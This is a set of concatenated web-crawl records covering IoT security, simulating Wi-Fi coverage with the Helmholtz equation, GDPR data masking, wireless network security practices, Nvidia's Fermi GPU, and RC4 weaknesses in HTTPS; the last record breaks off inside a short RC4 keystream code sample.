“Once the Internet of Things is fully blossomed, there are going to be billions of devices with billions of sensors, and having a human review how every piece of software touches those sensors — it’s impossible,” Rohatgi said.
Because it’s impossible to review all that code, conversations between inventors and developers are crucial, she said.
“Talking to folks who are really familiar with how these devices can be used for harm, educating them on what good practices are, what are best practices and just having a dialogue with people” before a product is released is “incredibly important,” Rohatgi said.
April marked 41 years since the world’s first mobile phone call was made. Martin Cooper, who conceived the idea while working for Motorola in the 1970s, led the team that ultimately developed and marketed the cellphone.
Despite privacy concerns, Cooper remains optimistic about the future of the Internet of Things.
“We are most productive when we use wireless technology,” he said recently at a conference in Washington.
He cited poverty, health care and education as three major worldwide issues that can be transformed by continued innovation.
“In each of those areas,” Cooper said, “we are on the verge of revolutions.”
The Medill News Service is a Washington program of the Medill School of Journalism at Northwestern University. | <urn:uuid:c97a9091-f4ad-42ed-8850-7927177fd5bd> | CC-MAIN-2017-09 | http://www.govtech.com/internet/Experts-Gov-Officials-Acknowledge-Transformative-Power-of-the-Internet-of-Things.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00613-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949699 | 1,028 | 3.078125 | 3 |
A home's Wi-Fi dead zones are, to most of us, a problem solved with guesswork. Your laptop streams just fine in this corner of the bedroom, but not the adjacent one; this arm of the couch is great for uploading photos, but not the other one. You avoid these places, and where the Wi-Fi works becomes a factor in the wear patterns of your home. In an effort to better understand, and possibly eradicate, his Wi-Fi dead zones, one man took the hard way: he solved the Helmholtz equation.
The Helmholtz equation models the propagation of electromagnetic waves, and solving it here involves using a sparse matrix to help minimize the amount of calculation a computer has to do in order to figure out the paths and interferences of waves, in this case from a Wi-Fi router. The whole process is similar to how scattered granular material, like rice or salt, will form complex patterns on top of a speaker depending on where the sound waves are hitting the surface.
The author of the post in question, Jason Cole, first solved the equation in two dimensions, and then applied it to his apartment's long and narrow two-bedroom layout. He wrote that he took his walls to have a very high refractive index, while empty space had a refractive index of 1.
Cole found in his simulation he could get pretty good coverage even with his router in one corner of the room, but could get "tendrils of Internet goodness" everywhere if he placed the router right in the center of the apartment. In a simulation where he gave the concrete some absorption potential, he found a map more like what he expected: excellent reception immediately around the router, and beams that shone into various rooms with periodic strong spots from the waves' interference.
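A minimal version of that computation looks like the sketch below: the two-dimensional Helmholtz equation, ∇²E + k²n²E = f, is discretized with finite differences, an interior wall is given a high (and slightly absorbing) refractive index, and the resulting sparse linear system is solved for the field radiated by a point source at the router's position. The grid size, wavelength and wall layout are arbitrary stand-ins for a real floor plan, not Cole's actual parameters.

```python
import numpy as np
from scipy.sparse import lil_matrix, csr_matrix
from scipy.sparse.linalg import spsolve

n_pts, h = 200, 0.01                          # grid points per side, spacing in metres
k0 = 2 * np.pi / 0.12                         # free-space wavenumber (~2.4 GHz Wi-Fi)
n = np.ones((n_pts, n_pts), dtype=complex)    # refractive index: 1 in empty space
n[:, 100:103] = 2.4 - 0.3j                    # one absorbing interior wall (assumed value)

N = n_pts * n_pts
A = lil_matrix((N, N), dtype=complex)
b = np.zeros(N, dtype=complex)
idx = lambda i, j: i * n_pts + j

for i in range(n_pts):
    for j in range(n_pts):
        p = idx(i, j)
        if i in (0, n_pts - 1) or j in (0, n_pts - 1):
            A[p, p] = 1.0                     # crude zero-field boundary condition
            continue
        A[p, p] = -4.0 / h**2 + (k0 * n[i, j]) ** 2
        for q in (idx(i - 1, j), idx(i + 1, j), idx(i, j - 1), idx(i, j + 1)):
            A[p, q] = 1.0 / h**2

b[idx(60, 40)] = 1.0                          # point source: the Wi-Fi router
field = spsolve(csr_matrix(A), b).reshape(n_pts, n_pts)
signal = np.abs(field)                        # plot this map to spot the dead zones
print(signal.max(), signal.mean())
```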
When he introduced time to the system, Cole was able to simulate how his apartment might fill with waves over a certain period and eventually become an oscillating standing wave forming pockets of high activity. For instance, the Wi-Fi signal hits a pretty good curve around the doorway into the second bedroom for good reception in a band a couple of feet wide down the center; there's also surprisingly good signal behind a thick wall in the upper right corner of the floor plan.
Cole writes that making the mapping simulation a Web service would probably be unfeasible due to the intensive calculations and suggested he might "experimentally map the field strength [himself]." In place of the intensive mathematical process, he will have to slowly amble around his apartment, holding a computer and clicking things to see if they go any faster here… or here… or here, like the rest of us. | <urn:uuid:cf4a9ba2-56c5-4e19-a507-95987dc2acde> | CC-MAIN-2017-09 | https://arstechnica.com/gadgets/2014/08/mapping-wi-fi-dead-zones-with-physics-and-gifs/?comments=1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00613-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.964377 | 539 | 2.828125 | 3 |
What is General Data Protection Regulation (GDPR)?
In a world of intellectual property theft, data breaches, and other cybercrimes, governments are creating regulations that require companies to take appropriate care when handling confidential personal data. The European Union's (EU) General Data Protection Regulation (GDPR) is a new, sweeping regulation that compels businesses to lock down sensitive customer information such as names, email addresses, or payment information.
The GDPR, which becomes law in 2018, sets strict limits on any business that collects, uses, or shares data from European citizens, encompassing firms based both inside and outside of the EU. Businesses that fail to implement appropriate data protective measures will face harsh penalties, including fines as great as 4% of global revenue--enough to jeopardize ongoing European operations for any corporation selling within the EU.
Data Masking and GDPR
To comply with the EU GDPR, firms must implement technical and organizational measures to secure personal information. More specifically, GDPR creates a strong imperative for companies to reevaluate how they store, manage, and protect data in on-premises data centers and cloud environments.
While stopping short of explicitly recommending specific solutions, GDPR urges businesses to consider technologies used to anonymize customer data. One such technology is data masking, an approach that transforms sensitive data values into fictitious, but realistic equivalents. Data masking de-identifies data to support GDPR compliance, but also preserves the format and consistency of the resulting data so that it remains valuable to operational analysts, software developers, or test engineers.
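To make that idea concrete, here is a small, self-contained sketch of deterministic masking: each value is replaced by a fictitious but format-preserving equivalent derived from a keyed hash, so the same input always masks to the same output (which keeps masked data consistent across tables) while the original value never appears downstream. This illustrates the general technique only; it is not Delphix's algorithm, and the key handling shown is deliberately naive.

```python
import hashlib
import hmac
import string

SECRET_KEY = b"rotate-me-and-keep-me-out-of-source-control"   # placeholder key management


def mask(value: str) -> str:
    """Replace each character with a fictitious equivalent of the same class."""
    digest = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).digest()
    out = []
    for i, ch in enumerate(value):
        b = digest[i % len(digest)]
        if ch.isdigit():
            out.append(string.digits[b % 10])
        elif ch.isalpha():
            letters = string.ascii_uppercase if ch.isupper() else string.ascii_lowercase
            out.append(letters[b % 26])
        else:
            out.append(ch)                    # keep separators such as '-', '@', '.'
    return "".join(out)


print(mask("4111-1111-1111-1111"))   # same shape as a payment card number
print(mask("alice@example.com"))     # still looks like an email address
print(mask("4111-1111-1111-1111"))   # deterministic: identical to the first output
```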
Data masking has become the de facto standard for protecting non-production data–data that resides in environments for development, testing, and reporting. Thus, it is critical in achieving EU GDPR compliance for non-production environments, which often contain over 90% of a firm's sensitive data.
Delphix Data Masking for GDPR Compliance
To make data masking for GDPR practical and effective, businesses must not only mask sensitive data, but also implement a solution for quickly delivering masked data to downstream environments. Legacy approaches to data masking are manual and resource-intensive, involving coordination across multiple teams that slows data delivery and limits masking coverage.
Delphix, however, seamlessly combines data masking with data virtualization technology to address the secure data delivery challenge head-on while complying with GDPR. With Delphix, firms can efficiently and automatically mask sensitive data, then deliver that secure data to downstream environments in just minutes, via self service. | <urn:uuid:01c4d198-edfb-44e5-8567-c407769b1c1e> | CC-MAIN-2017-09 | https://www.delphix.com/solutions/data-masking/gdpr | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00557-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.890249 | 513 | 2.9375 | 3 |
Managing Security Risks in a Wireless World
Wireless networks are extremely prevalent today, both at home and in work settings. This increased adoption of wireless networks can be attributed to lower cost and ease of installation, combined with benefits such as increased portability and productivity.
Setting up wireless networks generally does not require drilling holes or cabling. All you need to do to connect is plug in a wireless access point (AP) or router. The lack of cabling expands a network to one without a physical boundary and allows an end user to be portable and productive from anywhere within the wireless network range.
This open connectivity brings with it risks, however, some of which are similar to those in wired networks, while others are unique and increased on wireless networks. Poor security standards, coupled with immature technologies, flawed implementations and limited user awareness, make it difficult to design and deploy “secure” wireless networks. All the vulnerabilities of wired networks exist in wireless networks as well. The most noteworthy is the openness of the communication medium (airwaves). This is akin to storing valuables in a glass safe.
Wireless security threats include confidentiality, integrity and availability (CIA) of resources and information. Organizations have information to protect. This information can be financial, personal and intellectual, all of which can be sensitive. Unauthorized intruders can intercept and gain access, disclosing sensitive information (confidentiality breach) if encryption and other protective mechanisms between wireless devices are weak or vulnerable.
Disclosed information can be altered (integrity breach) intentionally by the intruder or unintentionally due to malfunction in data-synchronization routines between the wireless clients and the back-end storage. Intruders can launch attacks against wireless devices in the network and consume network bandwidth causing Denial of Service (DoS) attacks (availability breach), as well.
Know Your Enemy
The sixth-century BC Chinese general and master military strategist Sun Tzu, in his book The Art of War, wrote: "Know your enemy and know yourself, find naught in fear for 100 battles."
Enemies and threat agents that exploit wireless security vulnerabilities can be grouped into three major categories:
Script kiddies ($cr1p7k1dd13s): These enemies are motivated primarily by the thrill of electronically trespassing and are deterred quite easily by simple security measures. They usually are unaware of the consequences of breach and use tools and scripts readily available to gain access to networks on which they are not authorized. They are the least of the threats and are also referred to as “war dialers.”
Resource thieves: They consume resources such as bandwidth and disk space, downloading pirated movies, MP3s and pornography using stolen airwaves and networks. Like script kiddies, they are motivated by the thrill of freeloading and the need to remain untraced. They are capable of writing scripts to exploit vulnerabilities, but often look for easily exploitable vulnerabilities and don't pose a significantly greater threat than script kiddies.
Information thieves: They know exactly what they want (sensitive information), know how to get it, know how to hide their footprints and are capable of harm. They are not easily deterred and often go the extra mile in figuring out the network topology to gain access to the network.
The 5 W’s of Wireless Networks
With the understanding of the risks and threat agents associated with wireless networks, important questions one must answer before designing and implementing secure wireless networks are:
Why do you need to set up a wireless network? Ease of access (flexibility), unrestricted workspace (portability and productivity).
Where are you setting up the wireless network? Home, work, public location.
Who will be using your wireless networks? Internal employees, vendors, customers, general public.
What is it that you need to safeguard? Customer information, financial information, intellectual property, trade secrets.
When should you setup a wireless network? The right time to setup a wireless network is when you can acceptably manage and mitigate risks.
At a bare minimum, the following should be in place to thwart intruders in wireless networks:
Change all default settings. Most wireless devices (routers and APs) come with weak default configurations. Blank admin passwords or “admin/admin” username password combinations are classic examples. Due to flawed implementation and limited user awareness and education on the implications of deployment of these wireless devices with default configurations, many wireless networks are susceptible to security threats.
Select products that can support more secure technologies. For backward compatibility, if you are required to support weaker security technologies like Wired Equivalent Privacy (WEP) instead of Wi-Fi Protected Access (WPA and WPA2), do so only after performing a risk analysis and developing a plan to phase them out in favor of products that support more secure technologies, for example WPA and client/AP isolation, in which the client devices on your wireless network cannot see one another.
Educate, train and certify users and employees. This is the most proactive approach to implementing security in wireless networks. There is no greater defense than educated and trained personnel making wise decisions pertinent to wireless security.
Get employees certified in wireless security. The Certified Information Systems Security Professional (CISSP) credential by (ISC)2 is a Gold Standard certification that covers wireless security concepts. Another good vendor-neutral certification is the Certified Wireless Security Professional (CWSP) by CWNP.
Placebo Wireless Security
Some of the most common wireless security measures are myths and give a false sense of security. These include:
SSID cloaking: The Service Set Identifier (SSID) in a wireless AP is the name configured to be broadcast to client devices (laptop, PDAs) so that they can associate with the AP. In SSID cloaking, the SSID is not broadcast by the AP, but is distributed by out-of-band mechanisms beforehand to the wireless network users. Most organizations use SSID cloaking as a security measure. Although this is a recommended best-practice by the PCI Data Security Standard (PCI DSS), it provides little to no protection because every time a client associates with an AP, the SSID is present in clear text, and a man-in-the-middle (MITM) attack can deduce the SSID, allowing an intruder to easily bypass any intended security mechanism.
MAC address filtering: Every network device has a unique Media Access Control (MAC) address. Allowing access to your wireless networks based on MAC addresses is akin to having a bouncer with a list of valid names to allow into the party. With a plethora of MAC spoofing tools, coupled with the MAC address being sent in the header of every packet, MAC address filtering can easily be defeated.
Disabling DHCP: Dynamic Host Configuration Protocol (DHCP) provides the automatic assignment of Internet Protocol (IP) addresses for the clients associating with the wireless network. Disabling DHCP has little to no security value, as it would take a determined intruder fewer than 10 minutes to determine the IP assignment scheme and bypass security controls.
The Real Deal
Now that we are aware of how not to secure a wireless network, how should we?
Start with physical access control. Walls and physical boundaries provide little to no protection against wireless security threats. Nevertheless, it is imperative that wireless security measures are supplemented with physical security controls such as gated access, motion detectors, closed-circuit television | <urn:uuid:2dbb8422-018f-49ee-89b9-9a1b3be9832a> | CC-MAIN-2017-09 | http://certmag.com/managing-security-risks-in-a-wireless-world/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171706.94/warc/CC-MAIN-20170219104611-00609-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.927546 | 1,530 | 2.703125 | 3 |
Future Shock: The Internet of Compromised Things
It's doubtful that the average consumer would be aware that his or her refrigerator was participating in a DDoS attack. Even fewer would have any idea how to stop it.
If it contains software, it can be hacked. If it is connected to the Internet, it can be hacked remotely. This is the unfortunate reality of the state of computer software. It should come as no surprise that an Internet enabled smart-fridge can be subverted to send spam emails.
Writing software is tricky. The overabundance of failed software projects that clutter every organization is evidence of just how hard it is to write software that works as intended. For software to be secure, it must do what it is supposed to do and nothing else. The goal of a hacker is to find a way of tricking software into performing functions that it was not designed to do. By this route the attacker may be able to take control of the system and use it to execute the attacker’s commands.
Unfortunately, this is often all too easy. The same flaws in code are found over and over again. Inputs are not validated. Buffers can be overrun. Software runs with too many privileges. The results are that attackers are able to subvert systems to execute malicious instructions. What surprises me most is that we know how to fix these issues during the development process. We know how to write code without these potential vulnerabilities. We know how to review code to spot weaknesses. We know how to test code to catch failings before it is ever released. However, reviewing code and security testing are time consuming. Neither are their benefits immediately apparent in the product. The result is that they tend to get dropped when deadlines loom, if they were ever envisaged at all.
What’s more, even if your code has been verified and found to be secure, the same cannot be said for the third-party code with which it interacts. External libraries or the operating system may contain vulnerabilities that may affect your system, even if the code that you write is completely secure.
Patch Tuesday for your toaster?
The accepted method for remediating insecure code is to download and install updates to replace the vulnerable code. But how exactly do you update the software on your fridge or toaster? As increasing numbers of household devices are sold as Internet connected, it’s only natural to assume that the number of compromised devices is going to ramp up. The question, then, becomes: What can an attacker do with a compromised device, such as a refrigerator or a smart-TV? The information contained within these devices would hardly be worth stealing. However, spare processor and network capacity can be harnessed to become part of a botnet and participate in denial of service attacks, send spam, and even mine bitcoins.
One possible solution might be to screen Internet connections to things in order to detect and stop hacking attacks, block communication with botnet command and control servers, and bar any device that is not an email server from sending email. This would be considered usual within a corporate environment, but consumers are unlikely to have anything other than the simplest firewall on home networks. Nor are they likely to be aware that their fridges are spamming, let alone have the knowledge to remedy the situation.
On a personal level, and as a security professional, I’m not too troubled by the prospect of a spamming fridge. I can blacklist the offending IP address in the unlikely event that a corporate email server accepted an email sent from a consumer ISP IP address range. My biggest concern is what the Internet of Compromised Things represents on the cyber-security front. As cyber-criminals improve their skills in identifying and compromising embedded software in Internet-enabled devices, they will have more devices under their control. They will have greater capacities to launch denial-of-service and hacking attacks against embedded systems that control our home and working environments, such as those running heating, air-conditioning, and water pumps.
I hope that this column serves as a wake-up call for both consumers and the security industry. We need to take stock of the Internet enabled devices on our networks, and, as a minimum, start demanding that these devices are properly secured and guaranteed by manufacturers. Let’s chat about what that would mean in the comments.
Martin Lee is Technical Lead within Cisco’s TRAC team, where he researches the latest developments in cyber security and delivers expert opinion on how to mitigate emerging threats and related risks. | <urn:uuid:c4055eb6-292a-4d9e-ab78-f23eac50b8cb> | CC-MAIN-2017-09 | http://www.darkreading.com/vulnerabilities-and-threats/future-shock-the-internet-of-compromised-things-/d/d-id/1113550?piddl_msgorder=thrd | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172017.60/warc/CC-MAIN-20170219104612-00133-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.963085 | 925 | 2.75 | 3 |
Black Box Explains Spanning Tree and Alpha Ring Protocols
As computer networks have become mission-critical assets for most, if not all, businesses, keeping the network up and running has assumed a crucial importance. Just as there are different types of traffic that run over a computer network, there are different solutions to keeping that traffic flowing, each with its own pros and cons.
Spanning Tree Protocol (STP)
The Spanning Tree Protocol (standardized as IEEE 802.1d) specifies a network design with redundant links to provide automatic backup paths if an active link fails. STP also avoids the creation of bridge loops that cause broadcast storms. Without STP, Ethernet switches with redundant links have no standardized way to keep from looping data over and over again to the other switches in the network, eventually disabling the network’s ability to pass data.
The idea behind a Spanning Tree topology is to enable switches to automatically discover a subset of the network topology that is loop-free, i.e., a tree. With STP turned on, the switches will perform the spanning tree algorithm when they are first connected, as well as any time there is a topology change, and automatically communicate with each other in a loop-free mode. Then, should a failure of one of the active links occur, STP unblocks the redundant links to enable the network to continue transmitting traffic.
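In spirit, the algorithm computes a loop-free subset of a redundant topology: elect a root, keep one path from every switch back to it, and block the remaining links until a failure makes them needed. The breadth-first sketch below captures only that high-level idea; the real 802.1d protocol reaches the same result in a distributed way, using bridge IDs, path costs and BPDU exchanges rather than a central computation.

```python
from collections import deque


def spanning_tree(links, root):
    """Return (forwarding, blocked) link sets for a redundant switch topology."""
    neighbors = {}
    for a, b in links:
        neighbors.setdefault(a, set()).add(b)
        neighbors.setdefault(b, set()).add(a)

    forwarding, visited, queue = set(), {root}, deque([root])
    while queue:                                  # breadth-first walk from the root bridge
        switch = queue.popleft()
        for peer in sorted(neighbors[switch]):
            if peer not in visited:
                visited.add(peer)
                forwarding.add(frozenset((switch, peer)))
                queue.append(peer)

    blocked = {frozenset(link) for link in links} - forwarding
    return forwarding, blocked


# Three switches wired in a triangle: one redundant link must be blocked.
links = [("SW1", "SW2"), ("SW2", "SW3"), ("SW1", "SW3")]
forwarding, blocked = spanning_tree(links, root="SW1")
print("forwarding:", forwarding)
print("blocked:", blocked)    # STP unblocks this link if an active one fails
```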
The Alpha-Ring Protocol
The Alpha-Ring protocol is a proprietary protocol designed to provide a faster network recovery time after a failure than standard STP. As the name suggests, Alpha-Ring enables the switches to be organized in a ring arrangement. During normal operation, the backup path for the Alpha-Ring is blocked, and data follows the other links around the ring.
If, however, one of the active links fails, the Alpha-Ring protocol unblocks the backup path to enable data to keep flowing. Typical failover for Alpha-Ring protocol is less than 30 milliseconds.
In addition, unlike STP, Alpha-Ring does not operate using any bandwidth-consuming packets to check the ring status. The ring port connections are monitored by each switch individually without the need for test packets to be generated and transmitted around the ring.
Ethernet Ring Protocols
Although Ethernet is usually thought of as having a star or bus topology, it’s also possible to build an Ethernet network as a ring. This configuration has the advantage of providing a redundant pathway if a link goes down. A ring topology is often used in applications such as traffic signals and surveillance where long distances may make it difficult to run links in a star formation from a central switch and where downtime must be limited.
Generally speaking, ring architectures have these advantages:
1. They have fast failover times, typically sub-50ms.
2. They require a decreased number of ports. Fewer ports are needed to provide the same amount of resiliency as centralized switched networks with redundant paths. This results in decreased initial investment and lower ongoing maintenance costs.
3. They are scalable and enable a step-by-step network rollout. More switches can be added to the ring incrementally. The full traffic does not need to traverse a main/distribution switch.
4. They use bandwidth efficiently; dedicated paths are not required.
5. They simplify configuration. Predefined paths between the switches that are connected to the ring are not needed. | <urn:uuid:07f68c30-4cd8-49fe-a951-01957ce550fe> | CC-MAIN-2017-09 | https://www.blackbox.com/en-pr/products/black-box-explains/spanning-tree-and-alpha-ring-protocols | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174276.22/warc/CC-MAIN-20170219104614-00485-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.930059 | 703 | 3.546875 | 4 |
NIST looks at forensics tools for handheld devices
- By William Jackson
- Sep 13, 2004
As crime goes high-tech, investigators need to be familiar with techniques and tools for gathering, preserving, analyzing and documenting data from digital devices.
Handheld devices, such as personal digital assistants, are a distinct class of computers that are becoming increasingly common and offer their own forensic challenges.
The National Institute of Standards and Technology has evaluated some software tools currently available to investigators for gathering evidence from PDAs.
The interagency report, PDA Forensic Tools: An Overview and Analysis, focuses on two operating systems that account for the majority of handheld devices, Palm OS and Pocket PC, as well as some miscellaneous tools for Linux-based PDAs.
NIST evaluated the tools in a number of scenarios, on equipment ranging from a 16-MHz processor with 2M of ROM and 8M of RAM to a 400-MHz processor with 48M of ROM and 128M of RAM. The tools evaluated are:
- PDA Seizure from Paraben Corp. of Orem, Utah
- EnCase from Guidance Software Inc. of Pasadena, Calif.
- Palm dd from @stake Inc. of Cambridge, Mass.
- Palm OS Emulator from PalmSource Inc. of Sunnyvale, Calif.
- The open-source Pilot Link product
- The Duplicate Disk Unix utility
The evaluation was not comprehensive or a formal product test. Those efforts are being conducted by the Computer Forensics Tool Testing project, a NIST program being carried out in conjunction with law enforcement and investigative organizations in the departments of Defense, Homeland Security and Justice.
William Jackson is a Maryland-based freelance writer. | <urn:uuid:d9ab4fb7-0cdc-4d6e-bd5d-7bc85a509f42> | CC-MAIN-2017-09 | https://gcn.com/articles/2004/09/13/nist-looks-at-forensics-tools-for-handheld-devices.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00077-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.914515 | 352 | 2.578125 | 3 |
Google Street View Documenting Japan's Nuke Evacuation Area
In a related move, Google has announced that it now offers Google Public Alerts in Japan to help with emergency preparedness due to the ongoing risks of earthquakes and tsunamis in the region. "With nearly 5,000 earthquakes a year, it's important for people in Japan to have crisis preparedness and response information available at their fingertips," Yu Chen, partner technology manager at Google Maps, wrote in a March 6 post on the Google Maps Blog. "And from our own research, we know that when a disaster strikes, people turn to the Internet for more information about what is happening." The new Google public alerts service in Japan is the first such offering outside the United States, where Google has been offering alerts since January 2012. The alerts aim to provide accurate and relevant emergency notifications when and where people are searching for information online. "Relevant earthquake and tsunami warnings for Japan will now appear on Google Search, Google Maps and Google Now when you search online during a time of crisis," the post explained. "If a major earthquake alert is issued in Kanagawa Prefecture, for example, the alert information will appear on your desktop and mobile screens when you search for relevant information on Google Search and Google Maps."The Japan alerts are being created in conjunction with the Japan Meteorological Agency, which provides critical real-time data to alert the public, the post said. "We hope our technology, including Public Alerts, will help people better prepare for future crises and create more far-reaching support for crisis recovery," wrote Yu Chen. "This is why in Japan, Google has newly partnered with 14 Japanese prefectures and cities, including seven from the Tōhoku region, to make their government data available online and more easily accessible to users, both during a time of crisis and after." Google is planning to expand its Google Public Alerts to additional countries around the world in the future.
Users in Japan will also be able to access the alerts on their mobile devices when they use Google Now on their Android devices. | <urn:uuid:cdb7a64e-b746-4562-95b7-ab9eca22675b> | CC-MAIN-2017-09 | http://www.eweek.com/cloud/google-street-view-documenting-japans-nuke-evacuation-area-2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170875.20/warc/CC-MAIN-20170219104610-00429-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.950626 | 422 | 2.703125 | 3 |
A new algorithm uses cutting-edge techniques to help computers identify human activity from video input far more quickly and efficiently than previous systems.
Its inventors, MIT post-doc Hamed Pirsiavash and University of California at Irvine professor Deva Ramanan, will present the algorithm at the Conference on Computer Vision and Pattern Recognition in Columbus, Ohio next month, according to a statement from MIT.
The researchers drew on natural language processing techniques similar to those used in IBM's Watson and other emergent machine learning projects to create a "grammar" for each action they wanted the system to recognize.
Pirsiavash and Ramanan's creation scales search times linearly, meaning that a video 10 times the length of another will take only 10 times as long to search; some previous techniques would have taken 1,000 times as long. Additionally, the new algorithm can handle streaming video, because it can guess fairly accurately at the results of partial actions before they are completed.
Pirsiavash said in the statement that the process is much like the one a system such as Watson would use to diagram a sentence. Complicated actions are broken down into their component parts and the algorithm simply looks for a pattern that fits the grammar. "When you make tea, for instance, it doesn't matter whether you first put the teabag in the cup or put the kettle on the stove. But it's essential that you put the kettle on the stove before pouring the water into the cup," he said.
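To make the ordering idea concrete, here is a minimal sketch in Python of how a constraint like the tea example might be encoded and checked against a partial stream of detected sub-actions. The step names and the single rule are invented for illustration; the real system learns its grammars from video features rather than from hand-written rules.

    # Toy "action grammar" for making tea: some steps may occur in any order,
    # but pouring water is only valid after the kettle has gone on the stove.
    STEPS = {"teabag_in_cup", "kettle_on_stove", "pour_water"}
    MUST_PRECEDE = [("kettle_on_stove", "pour_water")]

    def consistent(observed):
        """True if a (possibly partial) sequence of detected sub-actions
        could still be a valid 'make tea' action."""
        if not all(step in STEPS for step in observed):
            return False
        for before, after in MUST_PRECEDE:
            if after in observed:
                if before not in observed:
                    return False          # effect seen before its prerequisite
                if observed.index(before) > observed.index(after):
                    return False          # prerequisite came too late
        return True

    print(consistent(["teabag_in_cup", "kettle_on_stove", "pour_water"]))  # True
    print(consistent(["kettle_on_stove", "teabag_in_cup"]))                # True (partial)
    print(consistent(["pour_water", "kettle_on_stove"]))                   # False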
Pirsiavash told Network World that he doesn't know when his algorithm might show up in real-world applications, but said it's definitely going to do so at some point.
"There are many companies working on commercializing computer vision systems," he said. "I am sure automatic action recognition will also be used in real products soon."
Read more about data center in Network World's Data Center section. | <urn:uuid:62eb263a-34a4-4fba-a31d-287fdff9924f> | CC-MAIN-2017-09 | http://www.computerworld.com.au/article/545104/computer_knows_re_bowling_new_algorithm_identifies_human_activity_from_video/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171463.89/warc/CC-MAIN-20170219104611-00129-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.950661 | 448 | 2.921875 | 3 |
By Patricia Resende / CIO Today. Updated October 01, 2009.
Nvidia used the GPU Technology Conference in San Jose, Calif., to show the world it has reached a new milestone in graphics processing. Nvidia demonstrated its next-generation GPU architecture, code-named Fermi. The new architecture will not replace the CPU, but will secure a significant place in PC system architecture.
Fermi's graphics capabilities will mean substantial improvements to game play, multimedia encoding and enhancement, and other PC applications, according to the company.
"It is completely clear that GPUs are now general-purpose parallel computing processors with amazing graphics, and not just graphics chips anymore," said Jen-Hsun Huang, cofounder and CEO of Nvidia. "The Fermi architecture, the integrated tools, libraries and engines are the direct results of the insights we have gained from working with thousands of CUDA (compute unified device architecture) developers around the world."
Huang provided several examples of Fermi's potential. In one demonstration, he created a realistic physical reaction for a game by throwing rag dolls at destructible walls. In another, he showed its value in 3-D stereoscopic video. A third demonstration showed how GPUs can be used to enhance processing of ultrasound recordings to detect breast cancer.
Nvidia said Fermi increases performance by as much as eight times over Nvidia's last-generation GPU. The increase is critical for high-performance computing applications such as quantum chemistry, linear algebra, and numerical simulation, according to Nvidia. It added that Fermi also provides supercomputing features and performance at one-tenth the cost and one-twentieth the power of traditional CPU-only servers.
The GPU architecture is designed for C++, makes parallel programming easier and increases performance on a greater variety of applications than in the past, the company said. Performance increases are seen in ray tracing, physics, high-precision scientific computing, sparse linear algebra, and sorting and search algorithms, according to Nvidia.
Fermi is also the first GPU to provide error-correcting code (ECC) protection for DRAM, Nvidia said.
Analysts have touted Nvidia's new architecture as the first complete GPU architecture. Because Fermi is derived from Nvidia's graphics products, it ensures the company will sell millions of software-compatible chips to PC gamers, according to Peter Glaskowsky, a senior technology analyst for Envisioneering Group.
Nvidia also garnered support for Fermi from various companies, including Dell, Hewlett-Packard and Microsoft.
But it was Oak Ridge National Laboratory that stepped up to announce it will use Nvidia's GPU architecture for a new supercomputer. The supercomputer, expected to be 10 times more powerful than the current fastest supercomputer, will be used to research energy and climate change.
"This would be the first coprocessing architecture that Oak Ridge has deployed for open science, and we are extremely excited about the opportunities it creates to solve huge scientific challenges," said Jeff Nichols, Oak Ridge associate lab director. | <urn:uuid:080caa92-324d-4b1e-8698-b5d259fa6103> | CC-MAIN-2017-09 | http://www.cio-today.com/article/index.php?story_id=13200G4U7ZO0 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00481-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.928233 | 626 | 2.96875 | 3 |
HTTPS Security Encryption Flaws Found
Security researchers find weaknesses that could be exploited to crack some types of encrypted Web communications.
Security researchers have discovered weaknesses that could be exploited to crack some types of encrypted Web communications.
The flaw exists in the RC4 encryption algorithm that's often used to help secure the SSL/TLS communications that underpin secure (HTTPS) Web pages. The flaw was first disclosed last week by University of Illinois at Chicago professor Dan Bernstein at the Fast Software Encryption conference in Singapore, in a talk titled "Failures of secret-key cryptography" that's based on research he conducted with researchers from University of London's Royal Holloway and the Eindhoven University of Technology in the Netherlands.
"The transport layer security (TLS) protocol aims to provide confidentiality and integrity of data in transit across untrusted networks like the Internet," according to the group's research presentation. "It is widely used to secure Web traffic and e-commerce transactions on the Internet."
But RC4, the researchers found, isn't sufficiently random, and with enough time and effort, an attacker could recover some plaintext from a communication secured using TLS and RC4. "We have found a new attack against TLS that allows an attacker to recover a limited amount of plaintext from a TLS connection when RC4 encryption is used," they said. "The attacks arise from statistical flaws in the keystream generated by the RC4 algorithm, which become apparent in TLS ciphertexts when the same plaintext is repeatedly encrypted at a fixed location across many TLS sessions."
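The kind of statistical flaw at issue is easy to observe directly. The Python sketch below (an illustration only, not the researchers' attack code) implements the RC4 keystream generator and counts how often the second output byte is zero across many random keys; the long-known result is roughly 1 in 128 rather than the 1 in 256 an unbiased stream would give.

    # Minimal RC4 keystream generator plus a check of one well-known bias:
    # the second keystream byte is zero about twice as often as it should be.
    import os

    def rc4_keystream(key, nbytes):
        S = list(range(256))
        j = 0
        for i in range(256):                          # key scheduling (KSA)
            j = (j + S[i] + key[i % len(key)]) % 256
            S[i], S[j] = S[j], S[i]
        i = j = 0
        out = []
        for _ in range(nbytes):                       # keystream output (PRGA)
            i = (i + 1) % 256
            j = (j + S[i]) % 256
            S[i], S[j] = S[j], S[i]
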